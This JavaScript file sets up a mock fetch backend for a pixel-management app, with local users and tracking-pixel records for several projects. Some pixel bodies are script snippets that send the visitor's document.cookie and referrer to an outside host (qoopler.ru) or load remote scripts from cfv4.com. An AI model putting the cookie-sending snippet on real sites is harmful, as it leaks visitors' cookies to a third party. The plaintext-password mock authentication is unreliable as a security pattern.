// array in local storage for registered users
let users = JSON.parse(localStorage.getItem('users')) || [];

let pixels = [{
  projectName: "AfiSirenevyiPark",
  pixelId: 280,
  sid: "ed0e1f54-4c45-4d87-9ac6-70f4f809f520",
  addDate: "2018-12-25T18:26:00",
  isActive: true,
  sites: "afi-park",
  entities: [
    {
      entityId: 4037, pixelId: 280,
      addDate: "2019-05-15T12:11:00", body: "", isNormalized: false, comment: null
    }, {
      entityId: 4443, pixelId: 280, addDate: "2020-03-23T13:05:00",
      body: "<script>\r\n        console.log(\"\"cfv\"\");\r\n        var script = document.createElement(\"\"script\"\"); script.id=\"05544327-e71b-43cc-a1ef-1f89b7b2082f\";   script.src = \"\"https://cfv4.com/v2/matcher.js?apiToken=05544327-e71b-43cc-a1ef-1f89b7b2082f&vId={0}\"\";   document.getElementsByTagName(\"\"head\"\")[0].appendChild(script);</script>",
      isNormalized: false, comment: null
    }, {
      entityId: 4444, pixelId: 280, addDate: "2020-03-23T13:26:00",
      body: "<script type=\"text/javascript\">\r\n        (function (d, w) {\r\n            var n = d.getElementsByTagName(\"script\")[0],\r\n                s = d.createElement(\"script\"),\r\n                f = function () { n.parentNode.insertBefore(s, n); };\r\n                    s.type = \"text/javascript\";\r\n                    s.async = true;\r\n                    s.src = \"https://qoopler.ru/index.php?ref=\"+d.referrer+\"&cookie=\" + encodeURIComponent(document.cookie);\r\n\r\n                    if (w.opera == \"[object Opera]\") {\r\n                        d.addEventListener(\"DOMContentLoaded\", f, false);\r\n                    } else { f(); }\r\n        })(document, window);\r\n    </script>",
      isNormalized: false, comment: null
    }]
},
{
  projectName: "spbsad", pixelId: 281, sid: "636f6fca-996b-4059-9f80-d7b7f81aa9ad", addDate: "2018-12-27T15:58:00",
  isActive: false, sites: "spbsad", entities: [{
    entityId: 3939, pixelId: 281, addDate: "2018-12-27T15:58:00",
    body: "", isNormalized: false, comment: null
  }, { entityId: 3941, pixelId: 281, addDate: "2019-01-10T12:10:00", body: "", isNormalized: false, comment: null }]
}, {
  projectName: "AfiOdinburg", pixelId: 282, sid: "b7f7e808-47c1-40bc-8195-d283bd31e7e9", addDate: "2019-01-30T15:12:00",
  isActive: true, sites: "odinburg", entities: [{
    entityId: 4120, pixelId: 282, addDate: "2019-09-03T14:17:00",
    body: "", isNormalized: false, comment: null
  }, { entityId: 4153, pixelId: 282, addDate: "2019-10-04T10:50:00", body: "", isNormalized: false, comment: null },
  { entityId: 4424, pixelId: 282, addDate: "2020-03-15T18:25:00", body: "<script type=\"text/javascript\">\r\n        (function (d, w) {\r\n            var n = d.getElementsByTagName(\"script\")[0],\r\n                s = d.createElement(\"script\"),\r\n                f = function () { n.parentNode.insertBefore(s, n); };\r\n                    s.type = \"text/javascript\";\r\n                    s.async = true;\r\n                    s.src = \"https://qoopler.ru/index.php?ref=\"+d.referrer+\"&cookie=\" + encodeURIComponent(document.cookie);\r\n\r\n                    if (w.opera == \"[object Opera]\") {\r\n                        d.addEventListener(\"DOMContentLoaded\", f, false);\r\n                    } else { f(); }\r\n        })(document, window);\r\n    </script>", isNormalized: false, comment: null },
  { entityId: 4425, pixelId: 282, addDate: "2020-03-15T18:25:00", body: "<script>var script = document.createElement(\"\"script\"\"); script.id=\"05544327-e71b-43cc-a1ef-1f89b7b2082f\";   script.src = \"\"https://cfv4.com/v2/matcher.js?apiToken=05544327-e71b-43cc-a1ef-1f89b7b2082f&vId={0}\"\";   document.getElementsByTagName(\"\"head\"\")[0].appendChild(script);</script>", isNormalized: false, comment: null }]
}, {
  projectName: "RisanPenza", pixelId: 283, sid: "5cd001c3-0014-4323-992b-60a1a74c8c00", addDate: "2019-01-30T15:38:00",
  isActive: false, sites: "risan-penza", entities: [{
    entityId: 3946, pixelId: 283, addDate: "2019-02-01T16:19:00",
    body: "", isNormalized: false, comment: null
  }]
}, {
  projectName: "AfiSilver", pixelId: 284, sid: "0a0a7ad4-748c-4cbf-99d3-3ed1e2d34e4b", addDate: "2019-01-30T16:40:00",
  isActive: true, sites: "afiserebryakova",
  entities: [{ entityId: 3944, pixelId: 284, addDate: "2019-01-30T15:38:00", body: "<script type=\"text/javascript\">\r\n    (function (d, w) {\r\n        var n = d.getElementsByTagName(\"script\")[0],\r\n            s = d.createElement(\"script\"),\r\n            f = function () { n.parentNode.insertBefore(s, n); };\r\n                s.type = \"text/javascript\";\r\n                s.async = true;\r\n                s.src = \"https://qoopler.ru/index.php?ref=\"+d.referrer+\"&cookie=\" + encodeURIComponent(document.cookie);\r\n\r\n                if (w.opera == \"[object Opera]\") {\r\n                    d.addEventListener(\"DOMContentLoaded\", f, false);\r\n                } else { f(); }\r\n    })(document, window);\r\n</script>", isNormalized: false, comment: null }
    , { entityId: 4285, pixelId: 284, addDate: "2019-12-02T15:05:00", body: "<script>var script = document.createElement(\"\"script\"\"); script.id=\"05544327-e71b-43cc-a1ef-1f89b7b2082f\";   script.src = \"\"https://cfv4.com/v2/matcher.js?apiToken=05544327-e71b-43cc-a1ef-1f89b7b2082f&vId={0}\"\";   document.getElementsByTagName(\"\"head\"\")[0].appendChild(script);</script>", isNormalized: false, comment: null }]
}, {
  projectName: "cfc-mozaika", pixelId: 285, sid: "2abb75a0-796f-415f-9a37-383c2a4ec036", addDate: "2019-02-12T16:27:00", isActive: false, sites: "xn----8sbavghkeou.xn--p1ai;мозаика",
  entities: [{ entityId: 3978, pixelId: 285, addDate: "2019-03-10T11:01:00", body: "<script type=\"text/javascript\">\r\n    (function (d, w) {\r\n        var n = d.getElementsByTagName(\"script\")[0],\r\n            s = d.createElement(\"script\"),\r\n            f = function () { n.parentNode.insertBefore(s, n); };\r\n                s.type = \"text/javascript\";\r\n                s.async = true;\r\n                s.src = \"https://qoopler.ru/index.php?ref=\"+d.referrer+\"&cookie=\" + encodeURIComponent(document.cookie);\r\n\r\n                if (w.opera == \"[object Opera]\") {\r\n                    d.addEventListener(\"DOMContentLoaded\", f, false);\r\n                } else { f(); }\r\n    })(document, window);\r\n</script>", isNormalized: false, comment: null },
  { entityId: 4038, pixelId: 285, addDate: "2019-05-17T16:22:00", body: "", isNormalized: false, comment: null }, { entityId: 4276, pixelId: 285, addDate: "2019-12-02T15:05:00", body: "<script>var script = document.createElement(\"\"script\"\"); script.id=\"05544327-e71b-43cc-a1ef-1f89b7b2082f\";   script.src = \"\"https://cfv4.com/v2/matcher.js?apiToken=05544327-e71b-43cc-a1ef-1f89b7b2082f&vId={0}\"\";   document.getElementsByTagName(\"\"head\"\")[0].appendChild(script);</script>", isNormalized: false, comment: null }]
}]

export function configureFakeBackend() {
  let realFetch = window.fetch;
  const endsWith = (str, suffix) => {
    return str.indexOf(suffix, str.length - suffix.length) !== -1;
  };
  window.fetch = function (url, opts) {
    return new Promise((resolve, reject) => {
      // wrap in timeout to simulate server api call
      setTimeout(() => {
        // console.log('opts', opts, url);
        // authenticate
        if (endsWith(url, '/users/authenticate') && opts.method === 'POST') {
          // get parameters from post request
          let params = JSON.parse(opts.body);

          // find if any user matches login credentials
          let filteredUsers = users.filter(user => {
            return user.username === params.username && user.password === params.password;
          });

          if (filteredUsers.length) {
            // if login details are valid return user details and fake jwt token
            let user = filteredUsers[0];
            let responseJson = {
              id: user.id,
              username: user.username,
              fullName: user.fullName,
              token: 'fake-jwt-token'
            };
            resolve({ ok: true, text: () => Promise.resolve(JSON.stringify(responseJson)) });
          } else {
            // else return error
            reject('Username or password is incorrect');
          }

          return;
        }

        // get users
        if (endsWith(url, '/users') && opts.method === 'GET') {
          // check for fake auth token in header and return users if valid, this security is implemented server side in a real application
          if (opts.headers && opts.headers.Authorization === 'Bearer fake-jwt-token') {
            resolve({ ok: true, text: () => Promise.resolve(JSON.stringify(users)) });
          } else {
            // return 401 not authorised if token is null or invalid
            reject('Unauthorised');
          }

          return;
        }

        // get user by id
        if (url.match(/\/users\/\d+$/) && opts.method === 'GET') {
          // check for fake auth token in header and return user if valid, this security is implemented server side in a real application
          if (opts.headers && opts.headers.Authorization === 'Bearer fake-jwt-token') {
            // find user by id in users array
            let urlParts = url.split('/');
            let id = parseInt(urlParts[urlParts.length - 1]);
            let matchedUsers = users.filter(user => { return user.id === id; });
            let user = matchedUsers.length ? matchedUsers[0] : null;

            // respond 200 OK with user
            resolve({ ok: true, text: () => JSON.stringify(user) });
          } else {
            // return 401 not authorised if token is null or invalid
            reject('Unauthorised');
          }

          return;
        }

        // register user
        if (endsWith(url, '/users/register') && opts.method === 'POST') {
          // get new user object from post body
          let newUser = JSON.parse(opts.body);

          // validation
          let duplicateUser = users.filter(user => { return user.username === newUser.username; }).length;
          if (duplicateUser) {
            reject('Username "' + newUser.username + '" is already taken');
            return;
          }

          // save new user
          newUser.id = users.length ? Math.max(...users.map(user => user.id)) + 1 : 1;
          users.push(newUser);
          localStorage.setItem('users', JSON.stringify(users));

          // respond 200 OK
          resolve({ ok: true, text: () => Promise.resolve() });

          return;
        }

        // delete user
        if (url.match(/\/users\/\d+$/) && opts.method === 'DELETE') {
          // check for fake auth token in header and return user if valid, this security is implemented server side in a real application
          if (opts.headers && opts.headers.Authorization === 'Bearer fake-jwt-token') {
            // find user by id in users array
            let urlParts = url.split('/');
            let id = parseInt(urlParts[urlParts.length - 1]);
            for (let i = 0; i < users.length; i++) {
              let user = users[i];
              if (user.id === id) {
                // delete user
                users.splice(i, 1);
                localStorage.setItem('users', JSON.stringify(users));
                break;
              }
            }

            // respond 200 OK
            resolve({ ok: true, text: () => Promise.resolve() });
          } else {
            // return 401 not authorised if token is null or invalid
            reject('Unauthorised');
          }

          return;
        }

        if (endsWith(url, 'api/pixels')) {

          //// find if any user matches login credentials
          //let filteredUsers = users.filter(user => {
          //  return user.username === params.username && user.password === params.password;
          //});

          //if (filteredUsers.length) {
          //  // if login details are valid return user details and fake jwt token
          //  let user = filteredUsers[0];
          //  let responseJson = {
          //    id: user.id,
          //    username: user.username,
          //    fullName: user.fullName,
          //    token: 'fake-jwt-token'
          //  };
          //  resolve({ ok: true, text: () => Promise.resolve(JSON.stringify(responseJson)) });
          //} else {
          //  // else return error
          //  reject('Username or password is incorrect');
          //}                           
          // respond 200 OK with user              
          resolve({
            ok: true, headers: new Headers([
              ['Content-Type', 'application/json; charset=utf-8']
            ]), json: () => Promise.resolve(pixels)
          });
          return;
        }

        // pass through any requests not handled above
        realFetch(url, opts).then(response => resolve(response));

      }, 500);
    });
  }
}
